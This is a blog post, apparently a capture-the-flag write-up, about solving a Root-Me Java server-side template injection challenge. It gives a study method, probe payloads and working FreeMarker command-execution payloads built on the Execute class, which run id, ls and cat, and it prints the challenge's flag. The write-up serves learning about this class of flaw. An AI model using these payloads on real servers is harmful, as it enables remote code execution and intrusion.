<!DOCTYPE html>
<html lang="en-US"><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Deepening My SSTI Knowledge: Java SSTI on Root-Me | Satish&#39;s Scribbles</title>
<meta property="og:title" content="Deepening My SSTI Knowledge: Java SSTI on Root-Me | Satish&#39;s Scribbles" />
<meta name="twitter:title" content="Deepening My SSTI Knowledge: Java SSTI on Root-Me | Satish&#39;s Scribbles" />
<meta itemprop="name" content="Deepening My SSTI Knowledge: Java SSTI on Root-Me | Satish&#39;s Scribbles" />
<meta name="application-name" content="Deepening My SSTI Knowledge: Java SSTI on Root-Me | Satish&#39;s Scribbles" />
<meta property="og:site_name" content="" />

<meta name="description" content="A journey from studying the theory of Server-Side Template Injection (SSTI) to applying it to solve a Java/FreeMarker challenge on Root-Me.">
<meta itemprop="description" content="A journey from studying the theory of Server-Side Template Injection (SSTI) to applying it to solve a Java/FreeMarker challenge on Root-Me." />
<meta property="og:description" content="A journey from studying the theory of Server-Side Template Injection (SSTI) to applying it to solve a Java/FreeMarker challenge on Root-Me." />
<meta name="twitter:description" content="A journey from studying the theory of Server-Side Template Injection (SSTI) to applying it to solve a Java/FreeMarker challenge on Root-Me." />

<meta property="og:locale" content="en-US" />
<meta name="language" content="en-US" />

  <link rel="alternate" hreflang="en" href="http://localhost:1313/post/ssti-study-and-rootme-challenge/" title="en-US 🇺🇸" />






<meta name="generator" content="Hugo 0.150.0">

    
    <meta property="og:url" content="http://localhost:1313/post/ssti-study-and-rootme-challenge/">
  <meta property="og:site_name" content="Satish&#39;s Scribbles">
  <meta property="og:title" content="Deepening My SSTI Knowledge: Java SSTI on Root-Me">
  <meta property="og:description" content="A journey from studying the theory of Server-Side Template Injection (SSTI) to applying it to solve a Java/FreeMarker challenge on Root-Me.">
  <meta property="og:locale" content="en_US">
  <meta property="og:type" content="article">
    <meta property="article:section" content="post">
    <meta property="article:published_time" content="2025-09-09T00:00:00+00:00">
    <meta property="article:modified_time" content="2025-09-09T00:00:00+00:00">
    <meta property="article:tag" content="SSTI">
    <meta property="article:tag" content="RootMe">
    <meta property="article:tag" content="Cybersecurity">
    <meta property="article:tag" content="Java">
    <meta property="article:tag" content="FreeMarker">
    <meta property="article:tag" content="RCE">
    <meta property="og:image" content="http://localhost:1313/images/share.webp">
        <meta property="fb:admins" content="0000000000">


    
    
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:image" content="http://localhost:1313/images/share.webp">
  <meta name="twitter:title" content="Deepening My SSTI Knowledge: Java SSTI on Root-Me">
  <meta name="twitter:description" content="A journey from studying the theory of Server-Side Template Injection (SSTI) to applying it to solve a Java/FreeMarker challenge on Root-Me.">
      <meta name="twitter:site" content="@www.x.com/alt_maximus">


    

    <link rel="canonical" href="http://localhost:1313/post/ssti-study-and-rootme-challenge/">
    <link href="/style.min.e390ba7da26222f4dc42a349955d76dbbe44e5ce2535a43de5a70633a0a9ec3c.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="http://localhost:1313/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
</head>
<body data-theme = "" class="notransition">

<script src="/js/theme.js"></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="http://localhost:1313/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/">
                        About
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/blog/">
                        Blog
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/contact/">
                        Contact
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Deepening My SSTI Knowledge: Java SSTI on Root-Me</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2025-09-09T00:00:00&#43;00:00" itemprop="datePublished"> Tuesday, Sep 9, 2025 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <p>After my first taste of Server-Side Template Injection (SSTI) with the PicoCTF challenge, I was hooked. It was a relatively straightforward introduction, and it left me wanting to learn more. This post documents my journey of diving deeper into SSTI, from studying the theory to solving a more complex challenge on Root-Me.</p>
<hr>
<h2 id="broadening-my-ssti-understanding">Broadening My SSTI Understanding</h2>
<p>I started by consuming as much information as I could find on SSTI. Here are some of the resources I found most helpful:</p>
<ul>
<li><a href="https://www.youtube.com/watch?v=x_1A9rCxREs">https://www.youtube.com/watch?v=x_1A9rCxREs</a></li>
<li><a href="https://tcm-sec.com/find-and-exploit-server-side-template-injection-ssti/">https://tcm-sec.com/find-and-exploit-server-side-template-injection-ssti/</a></li>
<li><a href="https://hackerone.com/reports/125980">https://hackerone.com/reports/125980</a></li>
<li><a href="https://github.com/DiogoMRSilva/websitesVulnerableToSSTI">https://github.com/DiogoMRSilva/websitesVulnerableToSSTI</a> (last update is older than 3 years)</li>
<li><a href="https://www.pmnh.site/post/writeup_spring_el_waf_bypass/">https://www.pmnh.site/post/writeup_spring_el_waf_bypass/</a></li>
<li><a href="https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756">https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756</a></li>
<li><a href="https://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Server-Side%20Template%20Injection%20RCE%20For%20The%20Modern%20Web%20App%20-%20BlackHat%2015.pdf">https://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Server-Side%20Template%20Injection%20RCE%20For%20The%20Modern%20Web%20App%20-%20BlackHat%2015.pdf</a></li>
<li><a href="https://github.com/payloadbox/ssti-payloads">https://github.com/payloadbox/ssti-payloads</a></li>
</ul>
<h3 id="key-takeaways">Key Takeaways</h3>
<ul>
<li><strong>SSTI vs. XSS:</strong> While they might seem similar, SSTI is far more dangerous. It attacks the server&rsquo;s internals directly, often leading to Remote Code Execution (RCE), whereas Cross-Site Scripting (XSS) is a client-side vulnerability.</li>
<li><strong>Template Engines as a Feature:</strong> Many applications, like wikis, blogs, and content management systems, intentionally expose template engines to users for rich functionality. The key is whether these engines are properly sandboxed.</li>
</ul>
<h3 id="a-methodology-for-ssti">A Methodology for SSTI</h3>
<p>I formulated a simple methodology for tackling potential SSTI vulnerabilities:</p>
<ol>
<li><strong>Detect:</strong> Look for plaintext input that gets rendered with some processing. This is a prime candidate for SSTI.</li>
<li><strong>Identify:</strong>
<ul>
<li>Probe with invalid syntax to trigger errors that might reveal the template engine.</li>
<li>Use a decision tree of payloads to identify the engine.</li>
<li>Use tools like Wappalyzer to identify the server&rsquo;s language and framework, which helps narrow down the possibilities.</li>
</ul>
</li>
<li><strong>Exploit:</strong>
<ul>
<li><strong>Read the Docs:</strong> Once the engine is identified, read its documentation, paying close attention to security sections and built-in methods.</li>
<li><strong>Explore:</strong> Understand the environment and look for gadgets that can be abused.</li>
<li><strong>Attack:</strong> Build an attack vector and iterate until you find something that works. Escalate the attack to achieve a higher impact, like RCE.</li>
</ul>
</li>
</ol>
<hr>
<h2 id="the-root-me-challenge-java-ssti">The Root-Me Challenge: Java SSTI</h2>
<p>With a solid theoretical foundation, I was ready for a new challenge: <a href="https://www.root-me.org/en/Challenges/Web-Server/Java-Server-side-Template-Injection">Java - Server-side Template Injection</a>.</p>
<h3 id="detection-and-identification">Detection and Identification</h3>
<p>The challenge presented a simple form that took a <code>nickname</code> as input. I used Caido to replay the request and automate the testing of a list of common SSTI payloads from the <a href="https://github.com/payloadbox/ssti-payloads">PayloadBox repo</a>.</p>
<p>Here is the <code>curl</code> command for the request:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="ln"> 1</span><span class="cl">curl <span class="s1">&#39;http://challenge01.root-me.org/web-serveur/ch41/check&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln"> 2</span><span class="cl"><span class="se"></span>  -X POST <span class="se">\
</span></span></span><span class="line"><span class="ln"> 3</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln"> 4</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Accept: text/plain, */*; q=0.01&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln"> 5</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Accept-Language: en-US,en;q=0.5&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln"> 6</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Accept-Encoding: gzip, deflate&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln"> 7</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Content-Type: application/x-www-form-urlencoded&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln"> 8</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;X-Requested-With: XMLHttpRequest&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln"> 9</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Origin: http://challenge01.root-me.org&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln">10</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Connection: keep-alive&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln">11</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Referer: http://challenge01.root-me.org/web-serveur/ch41/&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln">12</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Cookie: _ga_SRYSKX09J7=GS2.1.s1757387996$o1$g1$t1757388045$j11$l0$h0; _ga=GA1.1.1521611932.1757387996&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln">13</span><span class="cl"><span class="se"></span>  -H <span class="s1">&#39;Priority: u=0&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="ln">14</span><span class="cl"><span class="se"></span>  --data-raw <span class="s1">&#39;nickname=hi&#39;</span>
</span></span></code></pre></div><p>Two payloads worked:</p>
<ul>
<li><code>%24%7B6*6%7D</code> (URL-decoded: <code>${6*6}</code>) resulted in <code>36</code></li>
<li><code>%23%7B3*3%7D</code> (URL-decoded: <code>#{3*3}</code>) resulted in <code>9</code></li>
</ul>
<p>This suggested a Java-based template engine. To confirm, I sent a payload with invalid syntax: <code>%24%7B%7B3*3%7D%7D</code>. The server responded with a detailed error message:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="ln">1</span><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="ln">2</span><span class="cl">    <span class="nt">&#34;timestamp&#34;</span><span class="p">:</span> <span class="mi">1757388561239</span><span class="p">,</span>
</span></span><span class="line"><span class="ln">3</span><span class="cl">    <span class="nt">&#34;status&#34;</span><span class="p">:</span> <span class="mi">500</span><span class="p">,</span>
</span></span><span class="line"><span class="ln">4</span><span class="cl">    <span class="nt">&#34;error&#34;</span><span class="p">:</span> <span class="s2">&#34;Internal Server Error&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="ln">5</span><span class="cl">    <span class="nt">&#34;exception&#34;</span><span class="p">:</span> <span class="s2">&#34;freemarker.core.ParseException&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="ln">6</span><span class="cl">    <span class="nt">&#34;message&#34;</span><span class="p">:</span> <span class="s2">&#34;...&#34;</span>
</span></span><span class="line"><span class="ln">7</span><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>The exception clearly identified the template engine as <strong>FreeMarker</strong>.</p>
<h3 id="exploration-and-exploitation">Exploration and Exploitation</h3>
<p>Now that I knew I was dealing with FreeMarker, I started researching ways to achieve RCE. I found that the <code>freemarker.template.utility.Execute</code> class could be used to run shell commands.</p>
<p>My first attempt to use it failed, likely due to a syntax error or issues with URL encoding:</p>
<pre tabindex="0"><code class="language-freemarker" data-lang="freemarker">&lt;#assign ex=&#34;freemarker.template.utility.Execute&#34;?new()&gt; ${ ex(&#34;id&#34;) }
</code></pre><p>I took a step back and started with a simpler payload to confirm I could assign variables:</p>
<pre tabindex="0"><code class="language-freemarker" data-lang="freemarker">&lt;#assign myVar = &#34;Hello World&#34;&gt; ${myVar}
</code></pre><p>This worked! It returned <code>Hello World</code>. Now, I tried to instantiate the <code>Execute</code> class again:</p>
<pre tabindex="0"><code class="language-freemarker" data-lang="freemarker">&lt;#assign ex=&#34;freemarker.template.utility.Execute&#34;?new()&gt; ${ex}
</code></pre><p>This returned a 200 OK response, but no output. This was a good sign. It meant the object was likely created successfully. I was expecting an object hash, but the empty response was still promising.</p>
<p>I then revisited my RCE payload, making sure the syntax was correct. I realized I had made a silly mistake in my first attempt: I had forgotten the closing curly brace <code>}</code>. With the corrected payload, I was able to execute the <code>id</code> command:</p>
<pre tabindex="0"><code class="language-freemarker" data-lang="freemarker">&lt;#assign ex=&#34;freemarker.template.utility.Execute&#34;?new()&gt; ${ ex(&#34;id&#34;) }
</code></pre><p>The server responded with:</p>
<pre tabindex="0"><code>uid=1109(web-serveur-ch41) gid=1109(web-serveur-ch41) groupes=1109(web-serveur-ch41),100(users)
</code></pre><p>I had RCE!</p>
<h3 id="getting-the-flag">Getting the Flag</h3>
<p>Now for the final steps:</p>
<ol>
<li>
<p><strong>List the files:</strong></p>
<pre tabindex="0"><code class="language-freemarker" data-lang="freemarker">&lt;#assign ex=&#34;freemarker.template.utility.Execute&#34;?new()&gt; ${ ex(&#34;ls -la&#34;) }
</code></pre><p>This revealed a file named <code>SECRET_FLAG.txt</code>.</p>
</li>
<li>
<p><strong>Read the flag:</strong></p>
<pre tabindex="0"><code class="language-freemarker" data-lang="freemarker">&lt;#assign ex=&#34;freemarker.template.utility.Execute&#34;?new()&gt; ${ ex(&#34;cat SECRET_FLAG.txt&#34;) }
</code></pre></li>
</ol>
<p>And there it was: <strong><code>B3wareOfT3mplat3Inj3ction</code></strong></p>
<hr>
<p>This challenge was a fantastic way to solidify my understanding of SSTI. It required a more methodical approach than the PicoCTF challenge and highlighted the importance of careful payload construction and error analysis.</p>
<hr>
<h2 id="related-posts">Related Posts</h2>
<ul>
<li><a href="/post/picoctf-ssti-journey/">My First SSTI Adventure: A PicoCTF Walkthrough</a></li>
</ul>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
</div>
    <small class="footer_copyright">
        © 2025 Satish Patra.
        
    </small>
</footer>







    
    <script async src="http://localhost:1313/js/main.js" ></script>

    

</body>
</html>
